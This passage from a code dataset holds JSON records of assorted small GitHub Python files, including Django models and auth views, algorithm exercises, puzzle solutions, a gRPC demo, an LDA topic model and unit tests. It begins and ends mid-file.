self.tasks_set.filter(status_id_id=var)\n\n    def progress(self):\n        var = Status.objects.get(status='prog')\n        return self.tasks_set.filter(status_id_id=var)\n\n    def completed(self):\n        var = Status.objects.get(status='comp')\n        return self.tasks_set.filter(status_id_id=var)\n\n    def testing(self):\n        var = Status.objects.get(status='test')\n        return self.tasks_set.filter(status_id_id=var)\n\n    def review(self):\n        var = Status.objects.get(status='rev')\n        return self.tasks_set.filter(status_id_id=var)\n\n    def approved(self):\n        var = Status.objects.get(status='appr')\n        return self.tasks_set.filter(status_id_id=var)\n\n    def released(self):\n        var = Status.objects.get(status='rel')\n        return self.tasks_set.filter(status_id_id=var)\n\n    def get_absolute_url(self):\n        return reverse('projects:project-detail', kwargs={'workplace_id': self.workplace_id, 'slug': self.slug})\n\n    def save(self, *args, **kwargs):  # new\n        if not self.slug:\n            self.slug = slugify(self.name)\n        return super().save(*args, **kwargs)\n\n\nclass Status(models.Model):\n    status = models.CharField(max_length=15, choices=status, null=True, blank=True)\n\n    def __str__(self):\n        return self.status\n\n\nclass Tasks(models.Model):\n    project_id = models.ForeignKey(Project, on_delete=models.CASCADE)\n    user_id = models.ForeignKey(AccountUser, on_delete=models.SET_NULL, null=True)\n    status_id = models.ForeignKey(Status, on_delete=models.SET_NULL, null=True)\n    name = models.CharField(max_length=256)\n    date_created = models.DateTimeField(verbose_name='date created', auto_now_add=True)\n\n    def __str__(self):\n        return self.name\n\n\nclass Logs(models.Model):\n    task_id = models.ForeignKey(Tasks, on_delete=models.CASCADE)\n    messages = models.TextField()\n    date_created = models.DateTimeField(verbose_name='date created', auto_now_add=True)\n\n    def __str__(self):\n        return self.messages\n","repo_name":"Akoh1/project-management","sub_path":"projects/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"27259978802","text":"from collections import defaultdict\nfrom graph import Graph\nimport os\nd = defaultdict(list)\nV, E = [int(x) for x in input('Enter the number of vertices and edges on one line:').split()]\nfor i in range(V):\n    d[i] = []\ngraph = Graph(d)\nedges = []\nfor i in range(E):\n\n    u, w = [int(x) for x in input('Enter edge %d on one line:' %(i+1)).split()]\n    graph.graph[u - 1].append(w - 1)\n    graph.graph[w - 1].append(u - 1)\n    edge = [u, w]\n    edges.append(edge)\n\nout = dict(zip(range(V), [0]*V))\nlayers = graph.bfs(0)\nis_even = 0\ncolors = [0, 1]\n\nfor i in layers:\n    for ii in i:\n        out[ii] = 1*is_even\n    is_even = 1-is_even\nfor v in range(V):\n    temp_colors = colors.copy()\n    for next_v in graph.graph[v]:\n        try:\n            temp_colors.remove(out[next_v])\n        except ValueError:\n            pass\n    if len(temp_colors) == 0:\n        out[v] = colors[-1] + 1\n        colors.append(out[v])\ncolors_list = ['black', 'red', 'blue', 'yellow', 'green', 'white', 'pink', 'ivory', 'gray', 'cyan', 'gold', 'tan', 'brown', 'orange', 'coral', 'maroon']\ntry:\n    os.remove('dothitomau.dot')\nexcept FileNotFoundError:\n    pass\nf = open('dothitomau.dot', 'w+')\nf.write('graph dothi\\n{\\n')\nfor i in range(V):\n    f.write('%d [fillcolor=%s, style=filled];\\n' % (i+1, colors_list[out[i]]))\nfor i in edges:\n    f.write('%d -- %d;\\n' % (i[0], 
i[1]))\nf.write('}')\nf.close()\n\n\n\n\n","repo_name":"catShaark/b-a-i-t-a-p-t-o-a-n-r-o-i-r-a-c","sub_path":"coloring.py","file_name":"coloring.py","file_ext":"py","file_size_in_byte":1387,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"70751813172","text":"import math\nfrom collections import defaultdict\nfrom typing import List\n\n\nclass WordDistance:\n\n    def __init__(self, wordsDict: List[str]):\n        self.dic=defaultdict(list)\n        for i, w in enumerate(wordsDict):\n            self.dic[w].append(i)\n\n    def shortest(self, word1: str, word2: str) -> int:\n        list1,list2=self.dic[word1],self.dic[word2]\n        i=j=0\n        res=math.inf\n        while i<len(list1) and j<len(list2):\n            res=min(res,abs(list1[i]-list2[j]))\n            if list1[i]<list2[j]:\n                i+=1\n            else:\n                j+=1\n        return res\n\n\n# Your WordDistance object will be instantiated and called as such:\n# obj = WordDistance(wordsDict)\n# param_1 = obj.shortest(word1,word2)","repo_name":"HaojunYuan/MyLeetCode","sub_path":"244-shortest-word-distance-ii/244-shortest-word-distance-ii.py","file_name":"244-shortest-word-distance-ii.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"7805390474","text":"nama = 'M. Rafi Thufail'\nnim = 212410101082\nprint('Name : ' + (nama))\nprint('NIM : ' + str(nim))\n\nnilai = float(input('Enter a score: '))\n\nhasil = None \nif nilai <= 100 and nilai > 80:\n    hasil = 'A'\nelif nilai <= 80 and nilai >= 76:\n    hasil = 'AB'\nelif nilai <= 75 and nilai >= 71:\n    hasil = 'B'\nelif nilai <= 70 and nilai >= 66:\n    hasil = 'BC'\nelif nilai <=65 and nilai >= 56:\n    hasil = 'C'\nelif nilai <=55 and nilai >= 51:\n    hasil = 'CD'\nelif nilai <=50 and nilai > 45:\n    hasil = 'D'\nelif nilai <=45 and nilai >= 41:\n    hasil = 'ED'\nelif nilai <=40 and nilai >= 0:\n    hasil = 'E'\nelse:\n    print('Please enter a score of 100 or below!!!')\n    \nprint('Score {} = {}'.format(nilai, hasil))\n\n","repo_name":"WebsiteThufail/kelola-angka","sub_path":"212410101082_M.Rafi Thufail_konversi_nilai.py","file_name":"212410101082_M.Rafi Thufail_konversi_nilai.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"14036866930","text":"import socket\n\nclass Client():\n    def __init__(self, host, port):\n        self._HOST = host\n        self._PORT = port\n    \n    def send(self, msg):\n        self.__client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n        self.__client.connect((self._HOST, self._PORT))\n        message = msg.encode()\n        self.__client.send(message) # Send message to server\n        response = self.__client.recv(1024).decode()\n        self.__client.close()\n        return response\n","repo_name":"OtavioFSantos/email-protocol","sub_path":"client/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"39757116236","text":"# read input as list of starting sequences\r\ninp = [[int(x) for x in line.strip().split(',')] for line in open('input.txt')]\r\n\r\n\r\ndef rambunctious_recitation(seq, end):\r\n    # first n-1 starting numbers append into dict\r\n    # the number itself is a key, turn is a value\r\n    spoken_nums = {n:turn+1 for turn,n in enumerate(seq[:-1])}\r\n    # n-th starting number\r\n    spoken = seq[-1]\r\n    for turn in range(len(spoken_nums)+1, end):\r\n        # if spoken number is not in a set of spoken numbers\r\n        if spoken not in spoken_nums:\r\n            # add a number into the set\r\n            spoken_nums[spoken] = turn\r\n            # the next spoken 
number is 0\r\n            spoken = 0\r\n        # else spoken number is already in spoken numbers\r\n        else:\r\n            most_recently_turn = spoken_nums[spoken]\r\n            # update turn for a given number\r\n            spoken_nums[spoken] = turn\r\n            # the next spoken number will be 'age'\r\n            # (the time a number was most recently spoken\r\n            # before)\r\n            spoken = turn - most_recently_turn\r\n    return spoken\r\n\r\n\r\n# part 1\r\nprint(\"2020th number spoken in rambunctious recitation game:\")\r\nfor seq in inp:\r\n    print(f'\\t{seq} -->', rambunctious_recitation(seq, 2020))\r\nprint()\r\n\r\n# part 2\r\nprint(\"30000000th number spoken in rambunctious recitation game:\")\r\nfor seq in inp:\r\n    print(f'\\t{seq} -->', rambunctious_recitation(seq, 30000000))\r\nprint()\r\n","repo_name":"matusjokay/adventofcode","sub_path":"2020/15/15.py","file_name":"15.py","file_ext":"py","file_size_in_byte":1438,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
+{"seq_id":"4313614544","text":"import argparse\nimport glob\nimport json\n\n\ndef create_jsonl_file(input_dir, output_dir):\n    # Initialize an empty list to store the dictionaries\n    data = []\n\n    # Get a list of all the .txt files in the input directory\n    txt_files = glob.glob(f\"{input_dir}/*.txt\")\n\n    # Loop through each file and extract the data\n    for txt_file in txt_files:\n        # Open the file and read the lines\n        with open(txt_file, \"r\") as f:\n            lines = f.readlines()\n\n        # Extract the conversation lines by removing the *Action* lines\n        conversation = []\n        for line in lines:\n            if \"*Action*\" not in line:\n                conversation.append(line.strip())\n\n        # Combine the conversation lines into a single string\n        conversation_str = \"\\n\".join(conversation)\n\n        # Create a dictionary with the conversation string as the input and an empty output and a reward of 1.0\n        data_dict = {\"input\": conversation_str, \"output\": \"\", \"reward\": 1.0}\n\n        # Add the dictionary to the data list\n        data.append(data_dict)\n\n    # Write the data list to a jsonl file\n    with open(f\"{output_dir}/output.jsonl\", \"w\") as f:\n        for data_dict in data:\n            # Remove any lines that start with the = sign in the output\n            output_lines = data_dict[\"output\"].split(\"\\n\")\n            output_lines = [line for line in output_lines if not line.startswith(\"=\")]\n            output_str = \"\\n\".join(output_lines)\n\n            # Update the data dictionary with the cleaned output\n            data_dict[\"output\"] = output_str\n\n            # Write the updated dictionary to the file\n            json.dump(data_dict, f)\n            f.write(\"\\n\")\n\n\nif __name__ == \"__main__\":\n    parser = argparse.ArgumentParser(description=\"Organize training data for Pyg-style chat models.\")\n    parser.add_argument(\"--input\", type=str, help=\"Input directory containing .txt files.\")\n    parser.add_argument(\"--output\", type=str, help=\"Output directory to write output.jsonl file to.\")\n    args = parser.parse_args()\n\n    create_jsonl_file(args.input, args.output)\n","repo_name":"AlpinDale/VNParser","sub_path":"tools/data-parser.py","file_name":"data-parser.py","file_ext":"py","file_size_in_byte":2094,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"}
+{"seq_id":"21511688299","text":"# -*- coding: utf-8 -*-\nfrom retrying import retry\nimport requests\nfrom requests.exceptions import ConnectionError, ConnectTimeout, ReadTimeout\nfrom fake_useragent import UserAgent\n\nheader = {\"User-Agent\": UserAgent().random}\n\n\ndef downloader(url, method, data=None, headers={}, proxies=None, retry_times=10):\n    \"\"\"\n    General-purpose downloader
\n    :param url: url\n    :param method: request method; only GET and POST are supported\n    :param data: POST form data\n    :param proxies: proxies\n    :param retry_times: number of retries\n    :return: response text\n    \"\"\"\n    headers = dict(header, **headers)\n    while retry_times > 0:\n        try:\n            if method == 'GET':\n                if proxies:\n                    res = requests.get(url=url, headers=headers, proxies=proxies, timeout=30)\n                else:\n                    res = requests.get(url=url, headers=headers, timeout=30)\n            else:\n                if proxies:\n                    res = requests.post(url=url, data=data, headers=headers, proxies=proxies, timeout=30)\n                else:\n                    res = requests.post(url=url, data=data, headers=headers, timeout=30)\n            if res.status_code in [200, 201, 202]:\n                return res.text\n        except (ConnectTimeout, ReadTimeout, ConnectionError):\n            print(\"Fetch failed\", url)\n            return None\n        except Exception as e:\n            print(f'Request error: {repr(e)} -- retrying')\n        # always consume a retry so that a non-2xx response cannot loop forever\n        if retry_times > 0:\n            retry_times -= 1\n\n\n@retry(stop_max_attempt_number=8)\ndef downloader_old(url, method, data=None, options={}):\n    \"\"\"\n    General-purpose downloader; only handles GET and POST requests\n    :param url:\n    :param method:\n    :param data:\n    :param proxies:\n    :return:\n    \"\"\"\n    headers = dict(header, **options)\n    while True:\n        try:\n            if method == 'GET':\n                response = requests.get(url=url, headers=headers, timeout=10)\n                if response.status_code in [200, 201, 202]:\n                    return response.text\n            else:\n                response = requests.post(url=url, headers=headers, data=data, timeout=10)\n                if response.status_code in [200, 201, 202]:\n                    return response.text\n        except (ConnectTimeout, ReadTimeout, ConnectionError):\n            print(\"Fetch failed\", url)\n            return None\n        except Exception as e:\n            print(e.args)","repo_name":"pythonyhd/proxy_pool","sub_path":"proxypool/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2412,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"21"}
+{"seq_id":"40793196816","text":"import timeit\n\nimport numpy as np\nimport pandas as pd\nfrom ranking_util import basestuff, TwoD\nfrom necklace_split_binary import necklace_split\nfrom copy import deepcopy\n\n\ndef hybrid(path, sens_attr, columns, number_of_buckets):\n    G = list(pd.read_csv(path)[sens_attr].values)\n    n = len(G)\n    basestuff.read_file(file=path, columns=columns)\n    TwoD.initialize()\n    number_of_cuts = []\n    boundary_indices = []\n    boundaries = []\n    hash_buckets = []\n    Theta = []\n    swap_index = []\n    start = timeit.default_timer()\n    for i in range(n * n):\n        r_, j, theta = TwoD.GetNext()\n        r = deepcopy(r_)\n        if r is not None and j != -1:\n            idx1 = r[j]\n            idx2 = r[j + 1]\n            if i == 0 or (idx2 in boundary_indices and G[idx1] != G[idx2]):\n                F = necklace_split(\n                    path, columns, sens_attr, number_of_buckets, r, theta\n                )\n                boundary_indices = F[0]\n                boundaries.append(F[1])\n                hash_buckets.append((F[2]))\n                number_of_cuts.append(len(F[1]))\n                Theta.append(theta)\n                swap_index.append(j)\n        elif r is not None and j == -1:\n            F = necklace_split(path, columns, sens_attr, number_of_buckets, r, theta)\n            boundary_indices = F[0]\n            boundaries.append(F[1])\n            hash_buckets.append((F[2]))\n            number_of_cuts.append(len(F[1]))\n            Theta.append(theta)\n            swap_index.append(j)\n        else:\n            break\n    stop = timeit.default_timer()\n    return (\n        number_of_cuts[np.argmin(number_of_cuts)],\n        boundaries[np.argmin(number_of_cuts)],\n        hash_buckets[np.argmin(number_of_cuts)],\n        Theta[np.argmin(number_of_cuts)],\n        stop - start,\n        swap_index\n    )\n","repo_name":"UIC-InDeXLab/fairHashmap","sub_path":"hybrid.py","file_name":"hybrid.py","file_ext":"py","file_size_in_byte":1823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"30904062621","text":"import unittest\nimport os\nimport sys\nimport filecmp\nimport pdb\n\nsys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))\nfrom pre_processing import metric_pre_processing as mpp\n\nclass MetricPreProcessingTest(unittest.TestCase):\n def test_add_rows(self):\n row1 = ['2019-11-25 15:58:59 CEST', '16.0', '11200000000', '8', '1.99', '1.94', '2.13']\n row2 = ['2019-11-25 15:58:59 CEST', '14.0', '11400000000', '8', '2.01', '1.96', '2.15']\n expected_result = ['2019-11-25 15:58:59 CEST', 30.0, 22600000000.0, 16.0, 4.0, 3.9, 4.28]\n\n self.assertEqual(expected_result, mpp._add_rows(row1, row2))\n\n def test_get_average_for_row(self):\n row = ['2019-11-25 15:58:59 CEST', 30.0, 22600000000.0, 16.0, 4.0, 3.9, 4.28]\n expected_result = [\n '2019-11-25 15:58:59 CEST',\n '15.0',\n '11300000000.0',\n '8.0',\n '2.0',\n '1.95',\n '2.14']\n\n self.assertEqual(expected_result, mpp._get_average_for_row(row, 2))\n\n def test_get_average_for_row_with_strings_as_elements(self):\n row = ['2019-11-25 15:58:59 CEST', '15.0', '11300000000.0', '8.0', '2.0', '1.95', '2.14']\n expected_result = [\n '2019-11-25 15:58:59 CEST',\n '15.0',\n '11300000000.0',\n '8.0',\n '2.0',\n '1.95',\n '2.14']\n\n self.assertEqual(expected_result, mpp._get_average_for_row(row, 1))\n\n def test_get_output_file_name_with_suffix(self):\n self.assertEqual('./test_suffix.csv', mpp._get_output_file_name_with_suffix('./test.csv', '_suffix'))\n self.assertEqual('/this/is/a/absolute/path/to/a/file_suffix.csv',\n mpp._get_output_file_name_with_suffix('/this/is/a/absolute/path/to/a/file.csv', '_suffix'))\n\n\n def test_get_interpolated_rows_1_second_gap(self):\n row1 = ['2019-11-19 16:56:32 CEST','12','10000000000','8','0.8','1.02','1.18']\n row2 = ['2019-11-19 16:56:34 CEST','10','11000000000','8','0.8','1.00','1.20']\n\n expected = [['2019-11-19 16:56:33 CEST', '11.0', '10500000000.0', '8.0', '0.8', '1.01', '1.19']]\n actual = mpp._get_interpolated_rows(row1, row2)\n\n self.assertEqual(expected, actual)\n\n def test_get_interpolated_rows_2_second_gap(self):\n row1 = ['2019-11-19 16:56:32 CEST','12','10000000000','8','0.8','1.02','1.18']\n row2 = ['2019-11-19 16:56:35 CEST','9','11500000000','8','1.1','1.02','1.21']\n\n expected = [\n ['2019-11-19 16:56:33 CEST', '11.0', '10500000000.0', '8.0', '0.9', '1.02', '1.19'],\n ['2019-11-19 16:56:34 CEST', '10.0', '11000000000.0', '8.0', '1.0', '1.02', '1.20'] \n ]\n actual = mpp._get_interpolated_rows(row1, row2)\n\n \n def test_get_metrics_on_seconds_interval(self):\n mpp.get_metrics_on_seconds_interval('./data/test_metrics.csv')\n\n output_file_written = os.path.exists('./data/test_metrics_seconds.csv')\n\n self.assertTrue(output_file_written)\n self.assertTrue(filecmp.cmp('./data/test_metrics_seconds.csv', './data/test_metrics_seconds_expected.csv'))\n os.remove('./data/test_metrics_seconds.csv')\n \n def test_fill_metrics_missing_seconds_using_linear_interpolation(self):\n mpp.fill_metrics_missing_seconds_using_linear_interpolation('./data/test_metrics2.csv')\n\n output_file_written = os.path.exists('./data/test_metrics2_filled.csv')\n self.assertTrue(output_file_written)\n self.assertTrue(filecmp.cmp('./data/test_metrics2_filled.csv', './data/test_metrics2_expected.csv'))\n # os.remove('./data/test_metrics_seconds.csv')\n\nif __name__ == '__main__':\n 
\n    unittest.main()\n","repo_name":"Context-Aware-Monitoring/Efficient-Stream-Monitoring","sub_path":"tests/test_metric_pre_processing.py","file_name":"test_metric_pre_processing.py","file_ext":"py","file_size_in_byte":3740,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"22807046947","text":"#!/usr/bin/env python3\n\n#10 Read 3 values between 0 and 100 and generate a pie chart (uses 8.3)\n\nimport turtle\n\nt=turtle.Turtle()\nu=turtle.Turtle()\n\ndef CrearPoligono (radio,porcentaje,ancho,color=\"black\"):\n##    t.speed(1)\n    arco=0\n    arco=(porcentaje*360/100)\n    x=t.xcor()\n    y=t.ycor()\n    t.lt(90)\n    t.penup()\n    t.setposition(x,y)\n    t.pendown()\n    t.pencolor(\"black\")\n    t.fillcolor(color) \n    t.width (ancho)\n    t.begin_fill()\n    t.fd(radio)\n    t.rt(180-arco)\n    t.fd(radio)\n    t.penup()\n    t.setposition(x,y)\n    t.pendown()\n    t.lt(90-arco)\n    t.circle(radio,arco)\n    t.end_fill() \n    t.hideturtle()\n\n\ncolor=[\"blue\",\"red\",\"green\"]\nxw=-50\nyw=-40\nfor b in range (3):\n    porcentaje=(int(input(\"Enter the percentage to chart: \")))\n    CrearPoligono (100,porcentaje,3,color[b])\n    u.penup()\n    u.setposition(xw+(50*b),yw)\n    u.pendown()\n    u.pencolor(color[b])\n    u.write(str(porcentaje)+\"%\")\n    u.hideturtle()\n\n\n##CrearPoligono (100,60,5,\"blue\")\n##CrearPoligono (100,80,5,\"green\")\n##CrearPoligono (100,120,5,\"red\")\n##CrearPoligono (100,100,5,\"orange\")\n    \n","repo_name":"DamianNery/Tecnicas-De-Programacion","sub_path":"4Abril/13/GraficoTorta.py","file_name":"GraficoTorta.py","file_ext":"py","file_size_in_byte":1109,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"5073977924","text":"import sys\n\nimport extern as ext\n\n\ndef str_diff(str1, str2):\n    if len(str1) != len(str2):\n        print('problem3: str_diff: str1 length {} not equal to str2 length {}'.format(len(str1), len(str2)))\n        return sys.maxsize\n\n    diff_count = 0\n    for i in range(len(str1)):\n        if str1[i] != str2[i]:\n            diff_count += 1\n\n    return diff_count\n\n\ndef run():\n    with open(ext.FilenameIn) as f_in:\n        pattern = f_in.readline().strip()\n        genome = f_in.readline().strip()\n        d = int(f_in.readline())\n\n    positions = []\n\n    for i in range(len(genome) - len(pattern) + 1):\n        genome_window = genome[i:i + len(pattern)]\n        d_curr = str_diff(pattern, genome_window)\n        if d_curr <= d:\n            positions.append(str(i))\n\n    with open(ext.FilenameOut, 'w') as f_out:\n        f_out.write(' '.join(positions))\n","repo_name":"DeSerg/mipt-solutions","sub_path":"Term10/bioinformatics_tasks/problems/problem3.py","file_name":"problem3.py","file_ext":"py","file_size_in_byte":852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"71021285173","text":"from django.contrib.auth import get_user_model\nfrom django.utils import timezone\nfrom rest_framework import generics, status, permissions\nfrom rest_framework.authtoken.models import Token\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\n\nfrom member.serializers import UserSerializer\nUserModel = get_user_model()\n\n\nclass TokenLoginView(APIView):\n    \"\"\"\n    Log in with a token\n    \"\"\"\n\n    permission_classes = []\n\n    def post(self, request):\n        r_token = request.data.get('token', None)\n\n        if not r_token:\n            return Response({'detail': 'No token was provided.'}, status=status.HTTP_400_BAD_REQUEST)\n\n        token = Token.objects.filter(key=r_token).first()\n        if not token:\n            return Response({'detail': 'The token is not valid.'},
 status=status.HTTP_404_NOT_FOUND)\n\n        user = UserModel.objects.filter(id=token.user_id).first()\n        if not user:\n            return Response({'detail': 'The user does not exist.'}, status=status.HTTP_404_NOT_FOUND)\n\n        user.update_date = timezone.now()\n        user.save()\n\n        user_serializer = UserSerializer(user, context={'request': request})\n        context = {\n            'token': token.key,\n            'user': user_serializer.data\n        }\n\n        return Response(context, status=status.HTTP_200_OK)\n\n\nclass UserLogoutView(APIView):\n    \"\"\"\n    Log out the current user\n    \"\"\"\n\n    permission_classes = (\n        permissions.IsAuthenticated,\n    )\n\n    def post(self, request):\n        r_user = request.user\n        user = UserModel.objects.filter(id=r_user.id).first()\n        if not user:\n            return Response({'detail': 'The user does not exist.'}, status=status.HTTP_400_BAD_REQUEST)\n        \n        try:\n            request.user.auth_token.delete()\n        except Exception as error:\n            message = '{}'.format(error)\n            return Response({'detail': message}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)\n\n        return Response({'result': 'ok'}, status=status.HTTP_200_OK)\n","repo_name":"zinns58/example-django-test","sub_path":"project/member/views/auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":2085,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"70869602613","text":"from datetime import datetime\nfrom config import SECRET_KEY, ALGORITHM\nimport jwt\nfrom jwt.exceptions import PyJWTError\nfrom fastapi import HTTPException, Depends, status\nfrom fastapi.security import HTTPAuthorizationCredentials, HTTPBearer\n\n\nsecurity_scheme = HTTPBearer()\n\ndef verify_jwt_token(token: str):\n    try:\n        payload = jwt.decode(token, SECRET_KEY, algorithms=[ALGORITHM])\n        expiration = datetime.fromtimestamp(payload[\"exp\"])\n        if datetime.now() > expiration:\n            raise HTTPException(\n                status_code=status.HTTP_401_UNAUTHORIZED,\n                detail=\"Token has expired\",\n                headers={\"WWW-Authenticate\": \"Bearer\"},\n            )\n        else:\n            return payload\n    except PyJWTError:\n        raise HTTPException(\n            status_code=status.HTTP_401_UNAUTHORIZED,\n            detail=\"Invalid authentication credentials\",\n            headers={\"WWW-Authenticate\": \"Bearer\"},\n        )\n\nasync def get_current_user(token: HTTPAuthorizationCredentials = Depends(security_scheme)):\n    return verify_jwt_token(token.credentials)\n","repo_name":"a7744hsc/DFChat","sub_path":"backend/utils/security.py","file_name":"security.py","file_ext":"py","file_size_in_byte":1101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"16708959524","text":"from concurrent import futures\n\nimport grpc\nfrom flask import Flask\n\nimport proto_example_pb2\nimport proto_example_pb2_grpc\n\napp = Flask(__name__)\n\n\nclass GreetingServicer(proto_example_pb2_grpc.GreetingServiceServicer):\n    def SayHello(self, request, context):\n        response = proto_example_pb2.Response()\n        response.message = f\"Hello, {request.message}!\"\n        return response\n\n\nserver = grpc.server(futures.ThreadPoolExecutor(max_workers=10))\nproto_example_pb2_grpc.add_GreetingServiceServicer_to_server(GreetingServicer(), server)\nserver.add_insecure_port(\"[::]:50051\")\n\n\n@app.route(\"/\")\ndef index():\n    return \"gRPC Server is running!\"\n\n\nif __name__ == \"__main__\":\n    server.start()\n    app.run(host=\"0.0.0.0\", 
port=5001)\n","repo_name":"surya18091997/personal","sub_path":"grpc_server.py","file_name":"grpc_server.py","file_ext":"py","file_size_in_byte":741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28794411371","text":"import time\n\nfrom osbrain import Agent\nfrom osbrain import run_agent\nfrom osbrain import run_nameserver\n\n\nclass Greeter(Agent):\n def on_init(self):\n self.bind('PUSH', alias='main')\n\n def hello(self, name):\n self.send('main', 'Hello, %s!' % name)\n\n\nclass Bob(Agent):\n def custom_log(self, message):\n self.log_info('Received: %s' % message)\n\n\nif __name__ == '__main__':\n\n # System deployment\n ns = run_nameserver()\n alice = run_agent('Alice', base=Greeter)\n bob = run_agent('Bob', base=Bob)\n\n # System configuration\n bob.connect(alice.addr('main'), handler='custom_log')\n\n # Send messages\n for _ in range(3):\n alice.hello('Bob')\n time.sleep(1)\n\n ns.shutdown()\n","repo_name":"opensistemas-hub/osbrain","sub_path":"examples/push_pull_inherit.py","file_name":"push_pull_inherit.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","stars":172,"dataset":"github-code","pt":"21"} +{"seq_id":"21484473653","text":"import os\nimport string\n\nimport numpy as np\nimport pandas as pd\n\nimport nltk\nfrom nltk import word_tokenize, sent_tokenize, corpus\nfrom nltk.stem import PorterStemmer, WordNetLemmatizer\n\nimport gensim\nfrom gensim.models import LdaModel\nfrom gensim.corpora.dictionary import Dictionary\n\n\nnltk.download('popular')\n\n\nclass Lda2vec:\n def __init__(self, tokenizer=None, num_topics=50):\n '''\n :parameter tokenizer: tokenizer function, default nltk word tokenizer\n :parameter num_topics: number of topics, default 50\n '''\n self.num_topics = num_topics\n self.tokenizer = tokenizer if tokenizer is not None else self.__tokenizer\n\n self.dictionary = None\n self.lda = None\n self.__is_fitted = False\n\n\n def __check_fitted(self):\n if not self.__is_fitted:\n raise RuntimeError('Model has not been fitted, call fit(input_corpus) first.')\n\n\n def __tokenizer(self, text):\n tokens = []\n porter_stemmer = PorterStemmer()\n lemmatizer = WordNetLemmatizer()\n stop_words = set(corpus.stopwords.words('english'))\n\n text = ''.join(char for char in text if char not in string.punctuation)\n\n for sent in sent_tokenize(text, language='english'):\n for word in word_tokenize(sent, language='english'):\n if len(word) < 2 or word.lower() in stop_words:\n continue\n\n word = lemmatizer.lemmatize(word)\n # word = porter_stemmer.stem(word)\n tokens.append(word)\n\n return tokens\n\n\n def fit(self, input_tokens=None, input_strings=None):\n '''\n :parameter input_strings: iterable of strings,\n e.g. ['i love cs', 'i hate statistics']\n :parameter input_tokens: iterable of iterable of tokens,\n e.g. [['i', 'love', 'cs'], ['i', 'hate', 'statistics']]\n '''\n\n if input_strings is None and input_tokens is None:\n raise RuntimeError('Either input_tokens or input_strings must not be None.')\n\n if not input_tokens:\n input_tokens = list(map(self.tokenizer, input_strings))\n\n self.dictionary = Dictionary(input_tokens)\n self.corpus = [self.dictionary.doc2bow(tokens) for tokens in input_tokens]\n self.lda = LdaModel(self.corpus, num_topics=self.num_topics, alpha='auto', eval_every=5)\n self.__is_fitted = True\n\n\n def get_doc_vec(self, words):\n '''\n :parameter words: iterable of tokens, e.g. 
['i', 'love', 'cs']\n :returns np.ndarray of shape (num_topics, ) where each value represents the prob of the words being in that topic\n '''\n self.__check_fitted()\n vec = np.zeros(self.num_topics, )\n bow = self.dictionary.doc2bow(words)\n for i, p in self.lda[bow]:\n vec[i] = p\n return vec\n\n\nif __name__ == '__main__':\n data_dir = '../data/'\n df = pd.read_csv(os.path.join(data_dir, 'fulltrain.csv'), names=('Verdict', 'Text'))\n\n model = Lda2vec(num_topics=10)\n model.fit(input_strings=df['Text'])\n x = model.get_doc_vec('i love cs'.split())\n","repo_name":"careycwang/CS4248-Fake-News-Detection","sub_path":"src/Lda2vec.py","file_name":"Lda2vec.py","file_ext":"py","file_size_in_byte":3118,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"28124294712","text":"import sys\n\nLIMIT = 5 # 1000\n\n\ndef convert_to_intlist(line):\n return [int(elem) for elem in line.split()]\n\n\ndef minimum_steps_to_make_array_sorted(array, n):\n table = [[0] * LIMIT for _ in range(n)]\n elem = array[0]\n for x in range(1, LIMIT+1):\n table[0][x-1] = abs(x - elem)\n\n for ix in range(1, n):\n elem = array[ix]\n m = table[ix-1][0]\n for y in range(1, LIMIT+1):\n m = min(m, table[ix-1][y-1])\n table[ix][y-1] = m + abs(y - elem)\n return min(table[n-1][x-1] for x in range(1, LIMIT+1))\n\n\ndef main():\n reader = sys.stdin\n n = int(next(reader))\n array = convert_to_intlist(next(reader))\n result = minimum_steps_to_make_array_sorted(array, n)\n print(result)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"ghostrider77/competitive-programming-skills","sub_path":"Python/21_make_it_sorted.py","file_name":"21_make_it_sorted.py","file_ext":"py","file_size_in_byte":782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17443577003","text":"import gi\nimport os\n\nfrom gi.repository import GLib\nfrom gi.repository import Gio\nfrom gi.repository import GObject\nfrom gi.repository import Ide\n\nDEV_MODE = False\n\nclass RlsService(Ide.Object):\n _client = None\n _has_started = False\n _supervisor = None\n _monitor = None\n\n @classmethod\n def from_context(klass, context):\n return context.ensure_child_typed(RlsService)\n\n 